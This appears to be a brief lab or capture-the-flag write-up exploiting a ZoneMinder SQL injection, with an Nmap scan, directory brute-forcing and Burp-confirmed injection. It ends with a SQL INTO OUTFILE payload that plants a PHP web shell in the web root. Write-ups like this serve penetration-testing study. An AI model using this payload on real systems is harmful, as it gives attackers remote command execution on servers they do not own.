Zone Minder SQL injection

https://www.exploit-db.com/exploits/41239

MySQL UDF privilege escalation guide:

https://medium.com/r3d-buck3t/privilege-escalation-with-mysql-user-defined-functions-996ef7d5ceaf

Running Nmap shows port 80, 8080 and 3305

Port 80 page:

Port 3305 page:

Running feroxbuster on port 80 we find a zm directory running zoneminder

Investigating about possible vulnerabilities we find a SQL injection vulnerability

Modifying the payload to simplify it and sending the request with burpsuite we see the application sleeps for 5 seconds and confirms we have sql injection

Since port 3305 is running a default page that is located in /var/www/html lets try to put a webshell there with this payload

SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE "/var/www/html/webshell.php"